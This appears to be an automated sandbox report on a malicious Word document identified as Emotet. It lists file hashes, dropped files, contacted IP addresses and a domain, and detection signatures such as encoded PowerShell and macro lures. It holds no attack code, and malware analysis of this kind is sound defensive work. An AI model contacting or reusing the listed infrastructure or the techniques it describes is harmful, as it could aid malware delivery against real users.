31.0.0 Emerald
IR
344615
CloudBasic
19:54:57
26/01/2021
PO# 01222021.doc
defaultwindowsofficecookbook.jbs
Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
WINDOWS
556b98b4cdae000de8f496d6d896743c
b7ca4118eab252bc4758fa18265b04a2afbbf9c2
dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a
Microsoft Word document (32009/1) 79.99%
true
false
false
false
100
0
100
5
0
5
false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp
false
5D4D94EE7E06BBB0AF9584119797B23A
DBB111419C704F116EFA8E72471DD83E86E49677
4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D276006A-4137-4F1B-A238-F5A3AEDA2F09}.tmp
false
077391DECA1A52BFEF17769EC216C04F
37988417BC337B1835851A5C80AB570598288618
E8DB47CBB5176C6395AE34E4CF158381EBF0E5A337E870EB206BBB17E7D6FB8B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO# 01222021.LNK
false
6EB10DB054A2FC20329E9A24A1F74C5A
FCC1666D8F3F5F4C31E37E823BEDD6046FC0C3E6
33DA77C164AD6408A014B140971748E2E0AF6EDCBE16E3E84CA175041E8D1414
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
false
61D243ECFBDB337B6222DCEDA0836970
A345D638AFD23701681AC8EAB13A1CFFBFE7A670
F4BD2CCCA06B35839418ABCFB364DF38BA94C3A3143F78653E01CBA58220397F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
false
6AF5EAEBE6C935D9A5422D99EEE6BEF0
6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEA56CXGKG1P2T41MR9D.temp
false
C7E7B4D84BB21E802060729A72785E31
471EBC4B37281BA67F179E127DA129B5AA0ED9ED
4503E94124DD30A6A2003C278AAD5081AE991C6BC17B1957B74C2778F37A5850
C:\Users\user\Desktop\~$# 01222021.doc
false
6AF5EAEBE6C935D9A5422D99EEE6BEF0
6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
true
91C20850D113197A19A60B25AA08699D
E4D444F34C5E5DF4FACBDD674A523386B3F6383B
A4AD0AEC4018E7C9A63324A417792D798E62C4686A2235615FC2B7339CA87F39
195.159.28.230
69.38.130.14
103.143.46.51
cab.mykfn.com
true
103.143.46.51
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet